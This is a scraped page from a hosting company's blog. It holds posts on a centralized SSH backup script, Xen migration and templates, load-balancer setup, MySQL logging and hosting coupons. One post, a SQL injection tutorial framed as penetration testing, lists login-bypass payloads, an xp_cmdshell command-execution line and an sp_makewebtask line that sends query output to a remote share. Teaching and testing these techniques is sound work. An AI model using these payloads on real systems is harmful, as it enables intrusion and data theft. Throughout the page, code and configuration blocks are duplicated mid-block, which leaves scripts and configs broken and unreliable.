We have re-designed our website and are very proud of the new look! Take a look for yourself :
Let us know what you think!
Centralized remote backup script with SSH key authentication
Greetings,
It has been a while since we posted any useful tidbits for you , so we have decided to share one of our quick & dirty centralized backup scripts.
The script relies on ssh key based authentication, described here on this blog. It essentially parses a configuration file where each variable is separated by a comma and colon, as in the example config here :
hostname1,192.168.1.1,etc:var:root hostname2,192.168.1.2,etc:var:root:usr
Note the intended backup directories in the 3rd variable, separated by colon’s. Simply populate the backup-hosts.txt config file (located in the same folder as the script) with all the hosts you want to be backed up.
The script then ssh’s to the intended host, and sends a tar -czf stream (securely) over ssh, to be output into the destination of your choice. Ideally you should centralize this script on a box that has direct access to alot of disk space.
Find the script here :
#!/bin/sh
# Centralized Linux Backup Script
# By Star Dot Hosting , www.stardothosting.com
# Uses SSH Key based authentication and remote ssh commands to tar.gz folders to iSCSI storage
todaysdate=`date "+%Y-%m-%d %H:%M:%S"`
backupdest="/backups/linux-backups"
echo "Centralized Linux Backup: " $todaysdate > /var/log/linux-backup.log
echo -e "----------------------------------------------" >> /var/log/linux-backup.log
echo -e >> /var/log/linux-backup.log
for obj0 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | awk -F "," '{printf "%s\n", $2}');
do
backupname=`cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $1}'`
for obj1 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $3'} | awk '{gsub(":","\n");printf"%s", $
0}');
do
echo -e "backing up $obj0 with $obj1 directory" >> /var/log/linux-backup.log
ssh -l root $obj0 "(cd /$obj1/ && tar -czf - . -C /$obj1)" >> $backupdest/$backupname.$obj1.tar.gz 2>&1
if [ "$?" -eq 1 ]
then
echo -e "There were some errors while backing up $obj0 / $backupname within the $obj1 directory" >> /var/log/linux-backup.log
#exit 1
else
echo -e "Backup completed on $obj0 / $backupname while backing up $obj1 directory" >> /var/log/linux-backup.log
fi
done
done
echo "Backup Script Completed." >> /var/log/linux-backup.log
cat /var/log/linux-backup.log | mail -s "Centralized Backup Complete" topsoperations@topscms.com
# Centralized Linux Backup Script
# By Star Dot Hosting , www.stardothosting.com
# Uses SSH Key based authentication and remote ssh commands to tar.gz folders to iSCSI storage
todaysdate=`date "+%Y-%m-%d %H:%M:%S"`
backupdest="/backups/linux-backups"
echo "Centralized Linux Backup: " $todaysdate > /var/log/linux-backup.log
echo -e "----------------------------------------------" >> /var/log/linux-backup.log
echo -e >> /var/log/linux-backup.log
for obj0 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | awk -F "," '{printf "%s\n", $2}');
do
backupname=`cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $1}'`
for obj1 in $(cat /usr/local/bin/backup-hosts.txt | grep -v "\#" | grep $obj0 | awk -F "," '{printf "%s\n", $3'} | awk '{gsub(":","\n");printf"%s", $
0}');
do
echo -e "backing up $obj0 with $obj1 directory" >> /var/log/linux-backup.log
ssh -l root $obj0 "(cd /$obj1/ && tar -czf - . -C /$obj1)" >> $backupdest/$backupname.$obj1.tar.gz 2>&1
if [ "$?" -eq 1 ]
then
echo -e "There were some errors while backing up $obj0 / $backupname within the $obj1 directory" >> /var/log/linux-backup.log
#exit 1
else
echo -e "Backup completed on $obj0 / $backupname while backing up $obj1 directory" >> /var/log/linux-backup.log
fi
done
done
echo "Backup Script Completed." >> /var/log/linux-backup.log
cat /var/log/linux-backup.log | mail -s "Centralized Backup Complete" topsoperations@topscms.com
You could modify this script to keep different daily backups , pruned to keep only X number of days of backups (i.e. only 7 days worth). There is alot you can do here.
If you have a handful of linux or bsd servers that you would like to backup in a centralized location, without having an individual script to maintain on each server, then perhaps you could use or modify this script to suit your needs.
I hope this helps.
Related Links:
50% off any hosting plan for the first THREE months!
We are excited about a new promotion for our web hosting catalog here at *.hosting.
We are offering a 50% discount for ANY of our SHARED or VPS hosting plans for the first 3 (thats THREE) months!!!!
Simply enter the following promotional code during the signup process :
SDH50OFF2010
It’s that simple! The 50% discount will then be immediately applied to the first three months of hosting — no matter what the hosting plan you chose!
Happy Holidays from Star Dot Hosting!
Related Links:
Security Penetration Testing Series : SQL Injection
I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.
There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.
That tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”
This article does not introduce anything new, SQL injection has been widely written and used in the wild. I thought I’d write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.
What is SQL injection anyway?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
What do you need?
Technically all you need is a web browser.
What should I look for?
Web forms. Any input area of a website that interacts with their database backend. Could be a login form, search form or anything like that.
You could also look for pages that actually have querystrings in the URL such as :
http://whatever.com/index.asp?id=10
Testing if its vulnerable
With those query string URLs or web forms, you could do a simple test to see if its vulnerable to injection. Start with the “single quote trick” , something like this :
hi' or 1=1--
For example :
http://whatever.com/index.asp?id=hi' or 1=1--
If you do that in a login form for example, if it works, then you will be logged in without any password necessary.
Why ‘ or 1=1–?
Let us look at another example why ‘ or 1=1– is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://whatever.com/index.asp?category=food
In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.
Now, assume that we change the URL into something like this:
http://whatever.com/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to “food’ or 1=1– “, if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to ‘food’ or not. A double dash “–” tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote (‘). Sometimes, it may be possible to replace double dash with single hash “#”.
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Remote execution with SQL injection
Being able to inject SQL commands usually means we can execute any SQL query at will.Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (“) if single quote (‘) is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
Getting the output of my SQL query
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder “share” sharing for Everyone.
Hope this helps!
Related Links:
Migrate from Linux to Xen with Rsync
I decided to write this little guide to provide the relatively simple steps needed to migrate your linux system to a Xen (HVM) virtual instance.
It is assumed that on your source and destination boxes, that you only have one root “/” partition. If you partitioned out your file system differently, you will have to accommodate that based on these instructions.
The following steps walk you through the process of migrating linux to Xen from start to finish :
1. Install the exact same version of linux on your destination server
This isn’t really 100% necessary, obviously. You could always boot into Finnix, partition your disk and install Grub. If you are uncomfortable doing that, install the distribution from start to finish. The file system will be overwritten anyways.
2. Boot into finnix on the destination system
If you have never used Finnix, it is a “self contained, bootable linux distribution”. I like it alot actually and have used it for similar purposes, rescue operations and the like.
3. Setup networking on both destination and source systems
If both systems are on the same network, you could assign local IP addresses to ensure the process of synchronisation is speedy and unobstructed.
Ensure you configure networking either way and that you set a root password and start ssh :
passwd
/etc/init.d/ssh start
/etc/init.d/ssh start
4. Mount the partition that you want to copy to on the destination server
Remember, so far everything you are doing has been on the destination server. Mount the destination partition within finnix :
mount /dev/xvdb
5. On the source server, rsync all the files of the source partition to the destination partition
When logged into the source server, simply issue the following rsync command and direct it to the destination server’s partition you just mounted :
rsync -aHSKDvz -e ssh / root@12.34.56.78:/mnt/xvdb/
The rsync process will complete and the partition on the destination server should be ready to boot into. Remember to change the networking configuration if you dont want any IP conflicts to happen.
I hope this helps!
Related Links:
Foundry Load Balancers HTTP sticky sessions
This post is intended to be a general guide for configuring “stickied” load balanced HTTP servers. Whether it’s F5 load balancers, foundry load balancers or open source based load balancers (keepalived/lvs), the concepts are the same and can be migrated across said platforms.
If you have a paid of foundry’s and are looking to configure stickied load balanced HTTP servers, hopefully this guide will provide some assistance.
-
Logging into the load balancer
Telnet to the box and ‘enable’ to allow admin access. The first thing you want to do is show the current configuration to view the existing setup for other working boxes :
> telnet 192.x.x.x
Trying 192.x.x.x...
Connected to 10.x.x.x.
Escape character is '^]'.
User Access Verification
Please Enter Login Name: admin
Please Enter Password:
User login successful.
SLB-telnet@XXXX>enable
Enable Password:
Error - Incorrect username or password.
SLB-telnet@XXXX>enable
Enable Password:
SLB-telnet@XXXX#
Trying 192.x.x.x...
Connected to 10.x.x.x.
Escape character is '^]'.
User Access Verification
Please Enter Login Name: admin
Please Enter Password:
User login successful.
SLB-telnet@XXXX>enable
Enable Password:
Error - Incorrect username or password.
SLB-telnet@XXXX>enable
Enable Password:
SLB-telnet@XXXX#
-
Real servers : defining the multiple load balanced boxes
Show the existing configuration on the foundary :
sh config
Take a look at the configuration of two “real” servers, which are the two servers that are behind the load balancer that will have balanced sticky connections :
server real serverposapp01-tomcat01 192.168.1.141
port default disable
port 8001
!
!
server real serverposapp03-tomcat01 192.168.1.143
port default disable
port 8001
port default disable
port 8001
!
!
server real serverposapp03-tomcat01 192.168.1.143
port default disable
port 8001
The above example is balancing TCP 8001 traffic, which is for TOMCAT. Here are entries for two servers doing simple HTTP traffic :
server real serverapp01-vhost01 192.168.1.195
port default disable
port http
port http keepalive
port http url "HEAD /"
!
server real serverapp02-vhost01 192.168.1.196
port default disable
port http
port http keepalive
port http url "HEAD /"
port default disable
port http
port http keepalive
port http url "HEAD /"
!
server real serverapp02-vhost01 192.168.1.196
port default disable
port http
port http keepalive
port http url "HEAD /"
This example is similar to the tomcat example, except you have several options. “port default disable” disables all other ports. “port http keepalive” and “port http url “HEAD /”" define the http checks that take place to ensure apache is running on that box. If not , it will fail over to the second box and stop sending traffic to it.
-
SSL Connections
SSL incoming connections are handled by the load balancer initially, then passed off to the actual server as regular http / port 80 traffic. The internal box configuration would be similar to the above configuration examples :
server virtual portal 192.168.1.104
port default disable
port ssl sticky
port ssl ssl-terminate portal
bind ssl serverapp01-portal01 http
Notice how instead of "port http sticky" , its "port ssl sticky". First of all, the sticky option is only set on the "virtual" configuration directives. Secondly, the SSL traffic is bound to the real servers via http in the last line of this example. Its pretty self explanatory.
[edit] Regular HTTP Sticky Connections
If no SSL Is being used on the site at all, then all you need is to set an HTTP virtual configuration :
<code>
server virtual serverapp-vhost01 192.168.1.106
port default disable
port http sticky
bind http serverapp02-vhost01 http
port default disable
port ssl sticky
port ssl ssl-terminate portal
bind ssl serverapp01-portal01 http
Notice how instead of "port http sticky" , its "port ssl sticky". First of all, the sticky option is only set on the "virtual" configuration directives. Secondly, the SSL traffic is bound to the real servers via http in the last line of this example. Its pretty self explanatory.
[edit] Regular HTTP Sticky Connections
If no SSL Is being used on the site at all, then all you need is to set an HTTP virtual configuration :
<code>
server virtual serverapp-vhost01 192.168.1.106
port default disable
port http sticky
bind http serverapp02-vhost01 http
-
Configuring the external IP to NAT to the internal virtual
Typically, you will have a firewall in front of the load balancer that actaully holds the external ip addresses. The traffic is filtered initially by the firewall, then NAT’d to the virtual ip (VIP) of the load balancer, which then handles balancing the traffic.
You will need to either establish a new external ip , or use an existing one (for instance, if you are moving from 1 web server to 2 web servers , and want to balance the traffic using the load balancer). You need to setup the external IP address, and NAT it to the internal VIP.
-
Verifying the configuration works
Once everything is setup properly, and the external IP is being NAT’d to the load balancer, it is time to ensure the load balancer is seeing the connections. You could do this before doing the switchover on the firewall as well, just to ensure everything looks right before actually doing the switchover.
To see the active connections being load balanced, issue the following command (replacing the servername for whichever one you want to check) :
sh server real serverapp02-vhost01
That should display information similar to this :
Real Servers Info
========================
State(St) - ACT:active, ENB:enabled, FAL:failed, TST:test, DIS:disabled,
UNK:unknown, UNB:unbind, AWU:await-unbind, AWD:await-delete
Name: serverapp02-vhost01 State: Active Cost: 0 IP:192.168.1.196: 1
Mac: 0012.7990.d06a Weight: 0 MaxConn: 2000000
SrcNAT: not-cfg, not-op DstNAT: not-cfg, not-op Serv-Rsts: 0
tcp conn rate:udp conn rate = 1:0, max tcp conn rate:max udp conn rate = 8:0
BP max local conn configured No: 0 0 0 0 0 0
BP max conn percentage configured No: 0 0 0 0 0 0
Use local conn : No
Port St Ms ServerConn TotConn Rx-pkts Tx-pkts Rx-octet Tx-octet Reas
---- -- -- ------- ------- ------- ------- -------- -------- ----
default DIS 0 0 0 0 0 0 0 0
http ACT 0 104 13094 181671 150813 162364862 20325115 0
Server Total 104 13094 181671 150813 162364862 20325115 0
========================
State(St) - ACT:active, ENB:enabled, FAL:failed, TST:test, DIS:disabled,
UNK:unknown, UNB:unbind, AWU:await-unbind, AWD:await-delete
Name: serverapp02-vhost01 State: Active Cost: 0 IP:192.168.1.196: 1
Mac: 0012.7990.d06a Weight: 0 MaxConn: 2000000
SrcNAT: not-cfg, not-op DstNAT: not-cfg, not-op Serv-Rsts: 0
tcp conn rate:udp conn rate = 1:0, max tcp conn rate:max udp conn rate = 8:0
BP max local conn configured No: 0 0 0 0 0 0
BP max conn percentage configured No: 0 0 0 0 0 0
Use local conn : No
Port St Ms ServerConn TotConn Rx-pkts Tx-pkts Rx-octet Tx-octet Reas
---- -- -- ------- ------- ------- ------- -------- -------- ----
default DIS 0 0 0 0 0 0 0 0
http ACT 0 104 13094 181671 150813 162364862 20325115 0
Server Total 104 13094 181671 150813 162364862 20325115 0
The above is displaying the specific connection details for a single real server. To check the VIP / Virtual server :
sh server virtual tomcat
Which will display the following :
Virtual Servers Info
Name: tomcat State: Enabled IP:192.168.1.101: 1
Pred: least-conn ACL-Id: 0 TotalConn: 149959
Port State Sticky Concur Proxy DSR ServerConn TotConn PeakConn
---- ----- ------ ------ ----- --- ------- ------- --------
default disabled NO NO NO NO 0 0 0
ssl enabled YES NO NO NO 46 149959 443
Name: tomcat State: Enabled IP:192.168.1.101: 1
Pred: least-conn ACL-Id: 0 TotalConn: 149959
Port State Sticky Concur Proxy DSR ServerConn TotConn PeakConn
---- ----- ------ ------ ----- --- ------- ------- --------
default disabled NO NO NO NO 0 0 0
ssl enabled YES NO NO NO 46 149959 443
You can see that “ServerConn” is displaying 46 connections. Thats it!
Related Links:
Creating a Xen template
One way to increase the efficiencies of Xen based systems is to utilize templates. VMware talks about this in their whitepaper for ESX2 best practices.
With Xen, you have to create your own. Here is a straight forward guide for how to do it.
1. Bootstrap a DomU named
I recommend using a file-backed VBD, but partition or LVM volume will work fine as well. Here is an example /etc/xen/centos4-tpl
kernel = "/boot/vmlinuz-2.6.12.6-xenU"
memory = 256
name = "centos4-tpl"
disk = [ 'file:/opt/xen/domains/centos4-tpl/diskimage,sdb1,w','file:/opt/xen/domains/centos4-tpl/swapimage,sdb2,w' ]
root = "/dev/sdb1 ro"
dhcp="dhcp
memory = 256
name = "centos4-tpl"
disk = [ 'file:/opt/xen/domains/centos4-tpl/diskimage,sdb1,w','file:/opt/xen/domains/centos4-tpl/swapimage,sdb2,w' ]
root = "/dev/sdb1 ro"
dhcp="dhcp
This is just a normal system (DomU) install – see Centos-4 on Xen for an example. Un-customize files
2.Inside the VM, edit the following files
/etc/hosts
remove any address lines other than localhost
/etc/sysconfig/network
use a generic hostname which will be unique to each deployment
NETWORKING=yes
HOSTNAME=centos4-tpl-changeme.example.com
HOSTNAME=centos4-tpl-changeme.example.com
/etc/sysconfig/network-scripts/ifcfg-eth0
should look like this:
DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
ONBOOT=yes
BOOTPROTO=dhcp
also important – remove any line starting with HWADDR, e.g.:
HWADDR=00:10:5A:XX:YY:ZZ
Other configuration files to consider tweaking include /etc/dhclient.conf & /etc/hosts
3. Files to remove:
- SSH Host key files (auto-created at boot time)
rm -f /etc/ssh/*host*
4. Shutdown the template VM
xm shutdown centos4-tpl
You might normally link your VMs into /etc/xen/auto. I recommend against this as the template VM can be left shutdown until/unless you want to update it, saving valuable RAM and CPU cycles.
Clone the virtual disk Now we can deploy from the template by cloning the data into a clean diskimage (or partition or LVM volume). Create the diskimage using an appropriate size (must be larger than the template). Oh -the nice thing here is that there is flexibility. For instance, you can have a file-based diskimage and clone the data onto LVM volumes. As long as you can mount the (virtual) disks, you can clone templatized systems.
Here we use /mnt/disk to mount the new system disk, and /mnt/image to mount the template disk.
First, mount the template disk.
mount -o loop /opt/xen/domains/centos4-tpl/diskimage /mnt/image
Next, create and mount the new system (DomU) disk space & swap space.
mkdir -p /opt/xen/domains/cloned
cd /opt/xen/domains/cloned
dd if=/dev/zero of=diskimage bs=1024k count=2048
dd if=/dev/zero of=swapimage bs=1024k count=256
mkfs.ext3 diskimage
mkswap swapimage
mkdir -p /mnt/disk
mount -o loop /opt/xen/domains/cloned/diskimage /mnt/disk
cd /opt/xen/domains/cloned
dd if=/dev/zero of=diskimage bs=1024k count=2048
dd if=/dev/zero of=swapimage bs=1024k count=256
mkfs.ext3 diskimage
mkswap swapimage
mkdir -p /mnt/disk
mount -o loop /opt/xen/domains/cloned/diskimage /mnt/disk
Create the exclude file in /tmp/XenCloneExclude
proc/*
users/*
tmp/*
lost+found/
etc/mtab
users/*
tmp/*
lost+found/
etc/mtab
Copy the data across
rsync -av -SHWD --exclude-from="/tmp/XenCloneExclude" /mnt/image/ /mnt/disk
Chroot into the newly copied template and fixup certain files
chroot /mnt/disk /bin/bash
Fix the hostname, etc in the files we “un-customized” in the template.
Exit, unmount both the template image and volume
umount /mnt/disk
umount /mnt/image
umount /mnt/image
Setup your Xen config and be on your way!
cd /etc/xen
cp centos4-tpl cloned
(edit cloned to change name and paths to disk and swap)
xm create -c cloned
Related Links:
Hosting Coupon : 60% off the first month for ANY plan!
Hello there,
Just thought I’d share an exclusive coupon / discount for all of our shared / vps hosting plans that allows for 60% off the first month of hosting fee’s :
COUPON CODE : SDHTWT2010
Take a look at our main site for plan details. This coupon expires and there is only a limited number of them available!
Don’t say we never gave you nothin’ 
Related Links:
Company site re-design
Greetings!
I thought it would be prudent to let you all know that we have recently re-designed our front facing company website.
You’ll also notice that our core prices for shared and VPS hosting have been significantly lowered, with resources allocated for each plan increased significantly (!).
Take a look at our site, if you haven’t already : www.stardothosting.com
Related Links:
MySQL Query Log – diagnosing and debugging mysql
The general query log is a general record of what mysqld is doing. The server writes information to this log when clients connect or disconnect, and it logs each SQL statement received from clients. The general query log can be very useful when you suspect an error in a client and want to know exactly what the client sent to mysqld.
mysqld writes statements to the query log in the order that it receives them, which might differ from the order in which they are executed. This logging order contrasts to the binary log, for which statements are written after they are executed but before any locks are released. (Also, the query log contains all statements, whereas the binary log does not contain statements that only select data.)
To enable the general query log, start mysqld with the –log[=file_name] or -l [file_name] option.
If no file_name value is given for –log or -l, the default name is host_name.log in the data directory.
Server restarts and log flushing do not cause a new general query log file to be generated (although flushing closes and reopens it). On Unix, you can rename the file and create a new one by using the following commands:
shell> mv host_name.log host_name-old.log shell> mysqladmin flush-logs shell> cp host_name-old.log backup-directory shell> rm host_name-old.log
Before 5.0.17, you cannot rename a log file on Windows while the server has it open. You must stop the server and rename the file, and then restart the server to create a new log file. As of 5.0.17, this applies only to the error log. However, a stop and restart can be avoided by using FLUSH LOGS, which causes the server to rename the error log with an -old suffix and open a new error log.
Recent Comments